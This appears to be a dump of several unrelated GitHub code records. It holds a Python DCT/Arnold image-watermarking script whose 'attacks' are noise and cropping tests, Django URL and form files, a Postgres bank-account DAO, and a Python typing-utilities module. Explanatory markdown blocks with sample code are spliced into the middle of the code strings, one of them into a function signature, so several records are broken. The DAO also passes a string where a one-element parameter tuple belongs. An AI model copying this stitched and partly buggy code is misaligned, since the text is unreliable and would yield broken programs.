list_original[i]\r\n block_extract = list_extract[i]\r\n if block_original[0][0] < block_extract[0][0]:\r\n WaterMark[j][k] = 1 # 这里应该是1\r\n else:\r\n WaterMark[j][k] = 0 # 这里应该是0\r\n k += 1\r\n if k == 32:\r\n k = 0\r\n j += 1\r\n # Arnold 逆变换\r\n for i in range(10):\r\n WaterMark = dearnold(WaterMark)\r\n return WaterMark\r\n\r\n\r\ndef crop(img, a, b, x, 
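`division` cuts the carrier into 8×8 blocks, one per watermark bit (256·256/64 = 1024 = 32·32 blocks). The nested slicing loops can be replaced by a reshape/transpose; this sketch enumerates blocks in row-major order, which may differ from the column-band order `division` uses, so it is an equivalent-content alternative rather than a drop-in replacement:

```python
import numpy as np

def blocks_8x8(img):
    # (H, W) -> (H//8 * W//8, 8, 8), blocks enumerated row-major
    h, w = img.shape
    return (img.reshape(h // 8, 8, w // 8, 8)
               .transpose(0, 2, 1, 3)
               .reshape(-1, 8, 8))

img = np.arange(256 * 256).reshape(256, 256)
blocks = blocks_8x8(img)
print(blocks.shape)                            # (1024, 8, 8)
assert np.array_equal(blocks[0], img[:8, :8])  # first block is the top-left tile
```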
y):\r\n ''' \r\n :param a: 裁剪行起始位置\r\n :param b: 裁剪行终止位置\r\n :param x: 裁剪列起始位置\r\n :param y: 裁剪列终止位置\r\n :return: 裁剪后的图像\r\n '''\r\n row, col = img.shape\r\n crop_image = np.zeros((row, col))\r\n for i in range(col):\r\n for j in range(row):\r\n crop_image[i,j] = img[i,j]\r\n i = x\r\n j = a\r\n while i < y:\r\n while j < b:\r\n crop_image[i][j] = 255\r\n j += 1\r\n i += 1\r\n j = a\r\n return crop_image\r\n\r\n\r\ndef light_change(image, a):\r\n '''\r\n\r\n :param img: 载体图像\r\n :param a: 亮度变化系数\r\n :return: 改变后的图像\r\n '''\r\n row, col = image.shape\r\n for j in range(row):\r\n for i in range(col):\r\n image[i, j] = image[i, j] * a\r\n return image\r\n\r\ndef sp_noise(image,prob):\r\n\r\n '''\r\n 添加椒盐噪声\r\n prob:噪声比例\r\n '''\r\n\r\n output = np.zeros(image.shape,np.uint8)\r\n thres = 1 - prob\r\n\r\n for i in range(image.shape[0]):\r\n for j in range(image.shape[1]):\r\n rdn = random.random()\r\n if rdn < prob:\r\n output[i][j] = 0\r\n elif rdn > thres:\r\n output[i][j] = 255\r\n else:\r\n output[i][j] = image[i][j]\r\n\r\n return output\r\n\r\n\r\nCarrier = io.imread('d:/python实例/imgProcess/DCTimg/lena_color_256.tif') # 256 256 3\r\n\r\n# 分割RGB图像为三个通道\r\nCarrier_R = Carrier[:, :, 0]\r\nCarrier_G = Carrier[:, :, 1]\r\nCarrier_B = Carrier[:, :, 2]\r\n\r\nWaterMark = io.imread('D:/python实例/imgProcess/DCTimg/hide.jpg') # 其变成32 32\r\nWaterMark = cv2.resize(WaterMark, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\r\nCarrier_R = Carrier_R.astype(dtype='float')\r\nWaterMark = color.rgb2gray(WaterMark) # 32 32\r\nret, WaterMark = cv.threshold(WaterMark, 0.5, 1, cv2.THRESH_BINARY)\r\n# plt.imshow(WaterMark,cmap='gray')\r\n# plt.figure()\r\n\r\n# 分割为8*8的block矩阵\r\nlist = division(Carrier_R)\r\n#\r\n#\r\n# 自己的离散余弦变换\r\nlist_DCT = []\r\nblock = np.zeros((8, 8), dtype='float')\r\nfor i in trange(len(list)):\r\n # list_DCT.append(DCT_2D(list[i]))\r\n block = list[i]\r\n list_DCT.append(cv2.dct(block))\r\n\r\n# Arnold变换\r\nfor i in range(10):\r\n WaterMark = Arnold(WaterMark)\r\n\r\n# 乘性扰动\r\nlist_DCT_Mul = []\r\nlist_DCT_Mul = Mul_Disturbance(list_DCT, WaterMark)\r\n\r\n# 离散余弦反变换\r\nlist_iDCT = []\r\nfor i in trange(len(list_DCT_Mul)):\r\n # list_iDCT.append(iDCT2D(list_DCT_Mul[i])) # list_iDCT放置的是经过乘性扰动后的反余弦变换矩阵 大小8*8\r\n block = list_DCT_Mul[i]\r\n list_iDCT.append(cv.idct(block))\r\n\r\nrow, col = Carrier_R.shape\r\nCarrier_DCT = np.zeros((row, col), dtype='float32')\r\nMerge(Carrier_DCT, list_iDCT) # 当前Carrier_DCT中存放着嵌入水印后的矩阵\r\n\r\n# Carrier_DCT = Carrier_DCT.astype('')\r\n# 添加噪声\r\n\r\n# 添加高斯噪声\r\n# mean = 0\r\n# sigma = 6\r\n# gauss = np.random.normal(mean, sigma, (row, col))\r\n# image_gaussian = Carrier_DCT + gauss\r\n# image_gaussian = np.clip(image_gaussian, a_min=0, a_max=255)\r\n# plt.imshow(image_gaussian, cmap='gray')\r\n\r\n# 添加椒盐噪声\r\n# image_sp = sp_noise(Carrier_DCT,0.001)\r\n# image_sp = image_sp.astype('float')\r\n# plt.imshow(image_sp,cmap='gray')\r\n\r\n# 旋转处理(30°)\r\n# image_spin = transform.rotate(Carrier_DCT, 5)\r\n# plt.imshow(image_spin,cmap='gray')\r\n# #\r\n# # 裁剪处理\r\nimage_crop = crop(Carrier_DCT,70,150,70,150)\r\n# plt.imshow(image_crop,cmap='gray')\r\n#\r\n# 裁边攻击\r\n#\r\n# 锐化处理,采用拉普拉斯算子\r\n# img_laplace = filters.laplace(Carrier_DCT,ksize=3 ,mask=None)\r\n# img_enhance = Carrier_DCT + img_laplace\r\n# plt.imshow(img_enhance,cmap='gray')\r\n#\r\n#\r\n#\r\n# plt.imshow(Carrier_DCT,cmap='gray')\r\n# plt.figure()\r\n#\r\n# 提取水印图像\r\nWaterMark = WaterMark_extract(Carrier_R, Carrier_DCT)\r\n# plt.imshow(WaterMark, cmap='gray')\r\n\r\n# 高斯噪声水印提取\r\n# WaterMark_gaussian 
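`sp_noise` draws one uniform random number per pixel in a Python loop; the same salt-and-pepper corruption vectorizes with a single random field, pixels below `prob` going to 0 (pepper) and those above `1 - prob` going to 255 (salt):

```python
import numpy as np

def sp_noise_vec(image, prob):
    # Vectorized equivalent of the per-pixel loop above.
    rdn = np.random.random(image.shape)
    out = image.copy()
    out[rdn < prob] = 0        # pepper
    out[rdn > 1 - prob] = 255  # salt
    return out

img = np.full((4, 4), 128, dtype=np.uint8)
print(sp_noise_vec(img, 0.25))
```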
= WaterMark_extract(Carrier_R,image_gaussian)\r\n# print(ssim(WaterMark,WaterMark_gaussian))\r\n# plt.imshow(WaterMark_gaussian,cmap='gray')\r\n\r\n#\r\n# # 椒盐噪声水印提取\r\n# WaterMark_sp = WaterMark_extract(Carrier_R,image_sp)\r\n# print(ssim(WaterMark,WaterMark_sp))\r\n# plt.imshow(WaterMark_sp,cmap='gray')\r\n# plt.figure()\r\n# #\r\n# # 泊松噪声\r\n# WaterMark_poisson = WaterMark_extract(Carrier_R,image_sp)\r\n# plt.imshow(WaterMark_poisson,cmap='gray')\r\n# plt.figure()\r\n#\r\n# # 旋转操作\r\n# WaterMark_spin = WaterMark_extract(Carrier_R,image_spin)\r\n# plt.imshow(WaterMark_spin,cmap='gray')\r\n\r\n#\r\n# # 裁剪操作\r\nWaterMark_crop =WaterMark_extract(Carrier_R,image_crop)\r\nprint(ssim(WaterMark,WaterMark_crop))\r\nplt.imshow(WaterMark_crop,cmap='gray')\r\n# plt.figure()\r\n#\r\n# # 锐化处理\r\n# WaterMark_laplace = WaterMark_extract(Carrier_R,img_laplace)\r\n# plt.imshow(WaterMark_laplace,cmap='gray')\r\n# plt.figure()\r\n","repo_name":"Paraniodparania/img-process","sub_path":"DCT-Arnold.py","file_name":"DCT-Arnold.py","file_ext":"py","file_size_in_byte":9742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11178834689","text":"from django.contrib import admin\nfrom django.urls import path, include, re_path\n\nfrom . import views\n\napp_name = \"cursos\"\n\nurlpatterns = [\n path('', views.cursos, name=\"list\"),\n path('nuevo/', views.curso_nuevo, name=\"nuevo\"),\n path('/', views.curso_detail, name=\"detail\"),\n path('/editar/', views.curso_editar, name=\"editar\"),\n path('/borrar/', views.curso_borrar, name=\"borrar\"),\n path('/alumnos/nuevo/', views.curso_nuevo_alumno, name=\"nuevo_alumno\"),\n path('/alumnos//editar/', views.curso_editar_alumno, name=\"editar_alumno\"),\n path('/alumnos//borrar/', views.curso_borrar_alumno, name=\"borrar_alumno\"),\n]\n","repo_name":"javinievas/minervademo","sub_path":"minerva/cursos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36303692996","text":"from typing import List\n\nfrom daos.account_dao import AccountDAO\nfrom entities.account import Account\nfrom utils.connection_util import connection\n\n\nclass AccountDAOPostgres(AccountDAO):\n def create_account(self, client_id: int) -> Account:\n sql = \"\"\"insert into account values (default, %s, '', 0) returning account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id)))\n connection.commit()\n account_id = cursor.fetchone()[0]\n account = Account(account_id, client_id, \"\", 0)\n return account\n\n def get_accounts_by_client_id(self, client_id: int) -> List[Account]:\n sql = \"\"\"select * from account where client_id = %s order by account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id)))\n records = cursor.fetchall()\n account_list = []\n for account_parts in records:\n account = Account(account_parts[0], account_parts[1], account_parts[2], account_parts[3])\n account_list.append(account)\n return account_list\n\n def get_accounts_between(self, client_id: int, lower_bound: int, upper_bound: int) -> List[Account]:\n sql = \"\"\"select * from account where client_id = %s and balance > %s and balance < %s order by account_id\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id), str(lower_bound), str(upper_bound)))\n records = cursor.fetchall()\n account_list = []\n for account_parts in records:\n account = Account(account_parts[0], 
account_parts[1], account_parts[2], account_parts[3])\n account_list.append(account)\n return account_list\n\n def get_account_by_account_number(self, client_id: int, account_number: int) -> Account:\n sql = \"\"\"select * from account where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(client_id), str(account_number)))\n records = cursor.fetchall()\n for account_parts in records:\n account = Account(account_parts[0], account_parts[1], account_parts[2], account_parts[3])\n return account\n raise KeyError\n\n def update_account(self, client_id: int, account_number: int, account: Account) -> Account:\n sql = \"\"\"update account set account_name = %s, balance = %s where client_id = %s and account_id = %s \n returning account\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(account.name), str(account.balance), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def deposit(self, client_id: int, account_number: int, amount: float) -> Account:\n sql = \"\"\"update account set balance = balance + %s where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(amount), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def withdraw(self, client_id: int, account_number: int, amount: float) -> Account:\n sql = \"\"\"update account set balance = balance - %s where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (str(amount), str(client_id), str(account_number)))\n connection.commit()\n return self.get_account_by_account_number(client_id, account_number)\n\n def transfer(self, client_id: int, transfer_from: int, transfer_to: int, amount: float) -> List[Account]:\n account1 = self.withdraw(client_id, transfer_from, amount)\n account2 = self.deposit(client_id, transfer_to, amount)\n account_list = [account1, account2]\n return account_list\n\n def delete_account(self, client_id: int, account_number: int):\n sql = \"\"\"delete from account where client_id = %s and account_id = %s\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql, (client_id, account_number))\n connection.commit()\n return True\n","repo_name":"bostonbragg/Project0","sub_path":"daos/account_dao_postgres.py","file_name":"account_dao_postgres.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9944264503","text":"from django import forms\nfrom .models import Todo, Contact\n\n\nclass TodoForm(forms.ModelForm):\n title = forms.CharField(\n label=\"Title\",\n help_text=\"Enter the title of your todo item.\",\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n content = forms.CharField(\n label=\"Content\",\n help_text=\"Enter the content of your todo item.\",\n widget=forms.Textarea(attrs={'class': 'form-control'})\n )\n is_completed = forms.BooleanField(\n label=\"Is completed\",\n help_text=\"Check this box if the item is completed.\",\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\n class Meta:\n model = Todo\n fields = ['title', 'content', 'is_completed']\n\nclass ContactForm(forms.ModelForm):\n name = forms.CharField(\n label=\"Name\",\n help_text=\"Enter your name.\",\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n email = 
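A caution on the parameter passing above: `(str(client_id))` is a parenthesized string, not a one-element tuple, and since a string is itself a sequence, DB-API drivers bind each character as a separate parameter; any multi-digit id then fails. The fix is the trailing comma, `(client_id,)`. Below is a sketch of the difference using the stdlib's sqlite3 (its placeholder is `?` rather than psycopg2's `%s`; the table and values are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table account (account_id integer, client_id integer)")
conn.execute("insert into account values (1, 42)")

# Correct: a one-element tuple (note the trailing comma).
print(conn.execute(
    "select * from account where client_id = ?", (42,)
).fetchall())  # [(1, 42)]

# The buggy pattern: ("42") is just the string "42", a 2-character
# sequence, so the driver sees two parameters for one placeholder.
try:
    conn.execute("select * from account where client_id = ?", ("42"))
except sqlite3.ProgrammingError as e:
    print(e)
```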
forms.EmailField(\n label=\"Email\",\n help_text=\"Enter your email address.\",\n widget=forms.EmailInput(attrs={'class': 'form-control'})\n )\n message = forms.CharField(\n label=\"Message\",\n help_text=\"Enter your message.\",\n widget=forms.Textarea(attrs={'class': 'form-control'})\n )\n\n class Meta:\n model = Contact\n fields = ['name', 'email', 'message']\n","repo_name":"sinansarikaya/django-todo-app","sub_path":"todos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19518889173","text":"from __future__ import annotations\n\nimport collections.abc\nimport copy\nimport dataclasses\nimport functools\nimport inspect\nimport logging\nimport sys\nimport types\nimport typing\n\nimport typing_inspect\n\nfrom .dict_tools import *\n\n__all__ = [\n \"get_type\",\n \"get_arg_hints\",\n \"GenericCheck\",\n \"infer\",\n \"TypeVarMapping\",\n \"OfType\",\n \"replace_typevars\",\n \"match_functions\",\n \"match_values\",\n \"BoundInfer\",\n \"TypeVarScope\",\n \"infer_return_type\",\n \"ExpandedType\",\n \"replace_fn_typevars\",\n \"merge_typevars\",\n \"match_types\",\n \"get_origin_type\",\n \"get_fn_typevars\",\n \"ToCallable\",\n]\n\nT = typing.TypeVar(\"T\")\nU = typing.TypeVar(\"U\")\n\nlogger = logging.getLogger(__name__)\nlogger.addFilter(lambda record: False)\n# logger.addFilter(lambda record: record.msg.startswith(\"infer_return_type\"))\n\n\nclass GenericCheckType(type):\n @functools.lru_cache()\n def __subclasscheck__(cls, sub):\n \"\"\"\n Modified from https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L707-L717\n \"\"\"\n sub = getattr(sub, \"__origin__\", sub)\n if hasattr(cls, \"__origin__\"):\n return issubclass(sub, cls)\n if sub == typing.Any:\n return False\n\n # Needed when checking if T or Union is instance of Expression\n if isinstance(sub, typing.TypeVar) or sub == typing.Union: # type: ignore\n return False\n return super().__subclasscheck__(sub)\n\n\nclass GenericCheck(metaclass=GenericCheckType):\n \"\"\"\n Subclass this to support isinstance and issubclass checks with generic classes.\n \"\"\"\n\n pass\n\n\nclass OfType(GenericCheck, typing.Generic[T]):\n \"\"\"\n OfType[T] should be considered a subclass of T even though it is not.\n \"\"\"\n\n pass\n\n\nclass ExpandedType(GenericCheck, typing.Generic[T]):\n \"\"\"\n ExpandedType should be thought of as being expanded when passed into a function,\n so that `fn(ExpandedType[int]())` will be thought of as `fn(*xs)` where xs is an iterable of `int`.\n \"\"\"\n\n pass\n\n\noriginal_generic_getattr = typing._GenericAlias.__getattr__ # type: ignore\n\n\ndef generic_getattr(self, attr):\n \"\"\"\n Allows classmethods to get generic types\n by checking if we are getting a descriptor type\n and if we are, we pass in the generic type as the class\n instead of the origin type.\n\n Modified from\n https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L694-L699\n \"\"\"\n if \"__origin__\" in self.__dict__ and attr not in (\n \"__wrapped__\",\n \"__union_params__\",\n ):\n # If the attribute is a descriptor, pass in the generic class\n try:\n property = self.__origin__.__getattribute__(self.__origin__, attr)\n except Exception:\n return\n\n if hasattr(property, \"__get__\"):\n return property.__get__(None, self)\n # Otherwise, just resolve it normally\n return getattr(self.__origin__, attr)\n raise 
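`GenericCheckType` customizes `issubclass` by overriding `__subclasscheck__` on a metaclass, memoized with `functools.lru_cache`. A minimal standalone instance of the same pattern with a toy rule, to show where the hook sits:

```python
import functools

class EvenMeta(type):
    @functools.lru_cache()
    def __subclasscheck__(cls, sub):
        # Toy rule: treat int as a subclass; defer everything else to type.
        return sub is int or super().__subclasscheck__(sub)

class Even(metaclass=EvenMeta):
    pass

print(issubclass(int, Even))  # True, via the metaclass hook
print(issubclass(str, Even))  # False
```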
AttributeError(attr)\n\n\ntyping._GenericAlias.__getattr__ = generic_getattr # type: ignore\n\n\n# Allow isinstance and issubclass calls on generic types\ndef generic_subclasscheck(self, cls):\n \"\"\"\n Modified from https://github.com/python/cpython/blob/aa73841a8fdded4a462d045d1eb03899cbeecd65/Lib/typing.py#L707-L717\n \"\"\"\n self_origin = self.__origin__\n cls_origin = getattr(cls, \"__origin__\", cls)\n\n # If we are a callable type and other cls is is not an actualy callable\n # type, match against the ToCallable type instead\n if (\n self_origin == collections.abc.Callable\n and cls_origin != collections.abc.Callable\n ):\n self_origin = ToCallable\n return issubclass(cls_origin, self_origin)\n\n\n# Allow isinstance and issubclass calls on special forms like union\ndef special_form_subclasscheck(self, cls):\n if self == typing.Any:\n return True\n if self == cls:\n return True\n raise TypeError\n\n\ntyping._GenericAlias.__subclasscheck__ = generic_subclasscheck # type: ignore\ntyping._SpecialForm.__subclasscheck__ = special_form_subclasscheck # type: ignore\n\n\nclass ToCallableMeta(type):\n \"\"\"\n Type of type that can be used in isubclass to determine whether\n it wil be understood as a callable from the typing_tools perspective.\n\n Basically whatever is coerced in `get_type` to a callable.\n\n Need to switch typing.Callable for this, because that uses anything that works\n like a callable, which is not waht we want\n \"\"\"\n\n def __instancecheck__(cls, inst):\n return isinstance(\n inst,\n (\n functools.partial,\n Infer,\n BoundInfer,\n FunctionReplaceTyping,\n types.FunctionType,\n ),\n )\n\n def __subclasscheck__(cls, sub):\n \"\"\"Implement issubclass(sub, cls).\"\"\"\n return (\n issubclass(\n sub,\n (\n functools.partial,\n Infer,\n BoundInfer,\n FunctionReplaceTyping,\n types.FunctionType,\n ),\n )\n or typing_inspect.get_origin(sub) == collections.abc.Callable\n )\n\n\nclass ToCallable(metaclass=ToCallableMeta):\n def __call__(*__args, **__kwargs):\n ...\n\n\ndef get_origin(t: typing.Type) -> typing.Type:\n origin = typing_inspect.get_origin(t)\n # Need workaround for sequences\n # https://github.com/ilevkivskyi/typing_inspect/issues/36\n if origin == collections.abc.Sequence:\n return typing.Sequence\n\n if origin == tuple:\n return typing.Tuple # type: ignore\n\n return origin\n\n\ndef get_function_type(fn: typing.Callable) -> typing.Type[typing.Callable]:\n \"\"\"\n Gets the type of a function:\n\n Only supports positional args currently\n\n >>> get_function_type(lambda i: i)\n typing.Callable[[typing.Any], typing.Any]\n\n >>> def fn(a: int, b: str) -> float: ...\n >>> get_function_type(fn)\n typing.Callable[[int, str], float]\n\n >>> def no_return_type(a: int, b: str): ...\n >>> get_function_type(no_return_type)\n typing.Callable[[int, str], typing.Any]\n\n >>> def no_arg_type(a, b: str): ...\n >>> get_function_type(no_arg_type)\n typing.Callable[[typing.Any, str], typing.Any]\n \"\"\"\n signature = inspect_signature(fn)\n type_hints = typing_get_type_hints(fn)\n arg_hints: typing.List[typing.Type] = []\n\n for arg_name, p in signature.parameters.items():\n if p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n arg_hints.append(\n type_hints.get(arg_name, typing.cast(typing.Type, typing.Any))\n )\n else:\n raise NotImplementedError(f\"Does not support getting type of {signature}\")\n return typing.Callable[arg_hints, type_hints.get(\"return\", typing.Any)] # type: ignore\n\n\ndef get_function_replace_type(f: FunctionReplaceTyping) -> 
typing.Type[typing.Callable]:\n return replace_typevars(f.typevars, get_function_type(f.fn))\n\n\ndef get_bound_infer_type(b: BoundInfer) -> typing.Type[typing.Callable]:\n \"\"\"\n Returns a typing.Callable type that corresponds to the type of the bound infer.\n\n TODO: This logic is a combination of `get_function_type` and `infer_return_type`.\n We should eventually merge all of this into a consistant API so we don't have to duplicate this code.\n \"\"\"\n hints = copy.copy(typing_get_type_hints(b.fn))\n signature = inspect_signature(b.fn)\n\n # We want to get the original type hints for the first arg,\n # and match those against the first arg in the bound, so we get a typevar mapping\n first_arg_name = next(iter(signature.parameters.keys()))\n typevars: TypeVarMapping\n # Whether to skip the first arg of the param of the signature when computing the signature\n skip_first_param: bool\n owner_origin = get_origin_type(b.owner)\n if b.is_classmethod:\n # If we called this as a class method\n typevars = match_type(typing.cast(type, typing.Type[owner_origin]), b.owner)\n skip_first_param = True\n else:\n # we are calling an instance method on the class and passing the instance as the first arg\n typevars = match_type(typing.cast(type, typing.Type[owner_origin]), b.owner)\n skip_first_param = False\n hints[first_arg_name] = owner_origin\n\n # Then we want to replace all the typevar hints, with what we now know from the first arg\n arg_hints: typing.List[typing.Type] = []\n\n for arg_name, p in signature.parameters.items():\n if skip_first_param:\n skip_first_param = False\n continue\n if p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n arg_hints.append(\n replace_typevars(\n typevars, hints.get(arg_name, typing.cast(typing.Type, typing.Any))\n )\n )\n else:\n raise NotImplementedError(f\"Does not support getting type of {signature}\")\n return typing.cast(\n type,\n typing.Callable[\n arg_hints, # type: ignore\n replace_typevars(\n typevars, hints.get(\"return\", typing.cast(typing.Type, typing.Any))\n ),\n ],\n )\n\n\ndef get_type(v: T) -> typing.Type[T]:\n \"\"\"\n Returns the type of the value with generic arguments preserved.\n \"\"\"\n if isinstance(v, functools.partial): # type: ignore\n inner_type = get_type(v.func) # type: ignore\n if v.keywords: # type: ignore\n raise TypeError\n inner_args, inner_return = typing_inspect.get_args(inner_type)\n mapping: TypeVarMapping = merge_typevars(\n *(\n match_type(arg_type, arg)\n for (arg_type, arg) in zip(inner_args, v.args) # type: ignore\n )\n )\n rest_arg_types = inner_args[len(v.args) :] # type: ignore\n return typing.cast(\n type,\n typing.Callable[\n [replace_typevars(mapping, arg) for arg in rest_arg_types],\n replace_typevars(mapping, inner_return),\n ],\n )\n\n if isinstance(v, Infer):\n return get_function_type(v.fn) # type: ignore\n if isinstance(v, BoundInfer):\n return get_bound_infer_type(v) # type: ignore\n if isinstance(v, FunctionReplaceTyping):\n return get_function_replace_type(v) # type: ignore\n\n tp = typing_inspect.get_generic_type(v)\n # Special case, only support homogoneous tuple that are inferred to iterables\n if tp == tuple:\n if v:\n return typing.Sequence[get_type(v[0])] # type: ignore\n return typing.Sequence # type: ignore\n # Special case, also support function types.\n if tp == types.FunctionType: # noqa: E721\n return get_function_type(v) # type: ignore\n\n return tp\n\n\nTypeVarMapping = typing.Mapping[typing.TypeVar, typing.Type] # type: ignore\n\n\ndef match_values(hint_value: T, value: T) -> 
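`get_type` narrows a `functools.partial`'s `Callable` type by matching the already-bound positional arguments and keeping only the remaining parameter types. The stdlib performs the analogous narrowing at the signature level, which makes for a quick illustration:

```python
import functools
import inspect

def fn(a: int, b: str) -> float:
    return float(a)

print(inspect.signature(fn))                        # (a: int, b: str) -> float
print(inspect.signature(functools.partial(fn, 1)))  # (b: str) -> float
```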
TypeVarMapping:\n logger.debug(\"match_values hint_value=%s value=%s\", hint_value, value)\n hint_type = get_type(hint_value)\n logger.debug(\"hint_type=%s\", hint_type)\n return match_type(hint_type, value)\n\n\ndef match_type(hint: typing.Type[T], value: T) -> TypeVarMapping:\n logger.debug(\"match_type hint=%s value=%s\", hint, value)\n\n if typing_inspect.get_origin(hint) == type:\n (inner_hint,) = typing_inspect.get_args(hint)\n return match_types(inner_hint, typing.cast(typing.Type, value))\n return match_types(hint, get_type(value))\n\n\ndef merge_typevars(*typevars: TypeVarMapping) -> TypeVarMapping:\n \"\"\"\n Merges typevar mappings. If there is a duplicate key, either the values should be the\n same or one should have `typing.Any` type, or one should be a typevar itself. If it is a typevar,\n that typevar is also set to the other's value\n \"\"\"\n merged: TypeVarMapping = {}\n typevars_: typing.List[TypeVarMapping] = list(typevars)\n while typevars_:\n tvs: TypeVarMapping = typevars_.pop()\n for tv, tp in tvs.items(): # type: ignore\n if tv not in merged:\n merged[tv] = tp # type: ignore\n continue\n prev_tp = merged[tv]\n if prev_tp == typing.Any:\n merged[tv] = tp # type: ignore\n elif prev_tp == tp or tp == typing.Any:\n pass\n elif typing_inspect.is_typevar(prev_tp):\n merged[prev_tp] = merged[tv] = tp # type: ignore\n elif typing_inspect.is_typevar(tp):\n merged[tp] = prev_tp # type: ignore\n else:\n # Try merging them and choosing replacing the hint with the\n # merged values\n try:\n merged[tv] = replace_typevars( # type: ignore\n match_types(prev_tp, tp), prev_tp\n )\n continue\n except TypeError:\n pass\n try:\n merged[tv] = replace_typevars( # type: ignore\n match_types(tp, prev_tp), tp\n )\n continue\n except TypeError:\n pass\n raise TypeError(f\"Cannot merge {prev_tp} and {tp} for type var {tv}\")\n return merged\n\n\ndef get_inner_types(t: typing.Type) -> typing.Iterable[typing.Type]:\n \"\"\"\n Returns the inner types for a type.\n\n Like `typing_inspect.get_args` but special cases callable, so it returns\n the return type, then all the arg types.\n \"\"\"\n if t == typing.Callable: # type: ignore\n return []\n if typing_inspect.get_origin(t) == collections.abc.Callable:\n arg_types, return_type = typing_inspect.get_args(t)\n return [return_type] + arg_types\n return typing_inspect.get_args(t)\n\n\ndef get_all_typevars(t: typing.Type) -> typing.Iterable[typing.TypeVar]: # type: ignore\n for t in get_inner_types(t):\n if isinstance(t, typing.TypeVar): # type: ignore\n yield t\n else:\n yield from get_all_typevars(t)\n\n\ndef match_types(hint: typing.Type, t: typing.Type) -> TypeVarMapping:\n \"\"\"\n Matches a type hint with a type, return a mapping of any type vars to their values.\n \"\"\"\n logger.debug(\"match_types hint=%s type=%s\", hint, t)\n if hint == object:\n hint = typing.Any # type: ignore\n if t == object:\n t = typing.Any # type: ignore\n if hint == t:\n return {}\n\n # If it is an instance of OfType[Type[T]], then we should consider it as T\n if isinstance(t, OfType):\n (of_type,) = typing_inspect.get_args(get_type(t))\n assert issubclass(of_type, typing.Type)\n (t,) = typing_inspect.get_args(of_type)\n return match_types(hint, t)\n\n # If the type is an OfType[T] then we should really just consider it as T\n if issubclass(t, OfType) and not issubclass(hint, OfType):\n (t,) = typing_inspect.get_args(t)\n return match_types(hint, t)\n if issubclass(hint, OfType) and not issubclass(t, OfType):\n (hint,) = typing_inspect.get_args(hint)\n return 
match_types(hint, t)\n\n # Matching an expanded type is like matching just whatever it represents\n if issubclass(t, ExpandedType):\n (t,) = typing_inspect.get_args(t)\n\n if typing_inspect.is_typevar(hint):\n return {typing.cast(typing.TypeVar, hint): t}\n\n # This happens with match rule on conversion, like when the value is TypeVar\n if typing_inspect.is_typevar(t):\n return {}\n\n # if both are generic sequences, verify they are the same and have the same contents\n if (\n typing_inspect.is_generic_type(hint)\n and typing_inspect.is_generic_type(t)\n and typing_inspect.get_origin(hint) == collections.abc.Sequence\n and typing_inspect.get_origin(t) == collections.abc.Sequence\n ):\n try:\n t_inner = typing_inspect.get_args(t)[0]\n except IndexError:\n # Same as below, checking for default one, but in Python 3.9+\n # where the default sequence has no arg\n return {}\n if sys.version_info < (3, 9):\n # If t's inner arg is just the default one for sequence, it hasn't be initialized so assume\n # it was an empty tuple that created it and just return a match\n if t_inner == typing_inspect.get_args(typing.Sequence)[0]:\n return {}\n return match_types(typing_inspect.get_args(hint)[0], t_inner)\n\n if typing_inspect.is_union_type(hint):\n possible_types = typing_inspect.get_args(hint)\n # If union has a None type in it, and this value is None, there is a match\n if typing_inspect.is_optional_type(t) and isinstance(None, t):\n return {}\n # If this is a union, iterate through and try each\n for inner_type in possible_types:\n try:\n return match_types(inner_type, t)\n except TypeError:\n pass\n raise TypeError(\n f\"Cannot match concrete type {t} with any of the union types {possible_types}\"\n )\n\n logger.debug(\"checking if type subclass hint hint=%s type=%s\", hint, t)\n # Special case ellipsis to allow it to be used as a wildcard\n # to support using ... 
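Stripped of the `OfType`/`ExpandedType`/union special cases, the core of `match_types` is a recursive unification: a bare `TypeVar` binds to the concrete type, and matching origins recurse into their type arguments. A toy stdlib-only matcher showing that shape (it raises `TypeError` on mismatch, like the full version above):

```python
import typing

T = typing.TypeVar("T")

def match(hint, t):
    # Returns a {TypeVar: concrete type} mapping, or raises TypeError.
    if isinstance(hint, typing.TypeVar):
        return {hint: t}
    if typing.get_origin(hint) != typing.get_origin(t):
        raise TypeError(f"{t} does not match {hint}")
    out = {}
    for h, c in zip(typing.get_args(hint), typing.get_args(t)):
        out.update(match(h, c))
    return out

print(match(typing.Dict[str, T], typing.Dict[str, int]))  # {~T: <class 'int'>}
```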
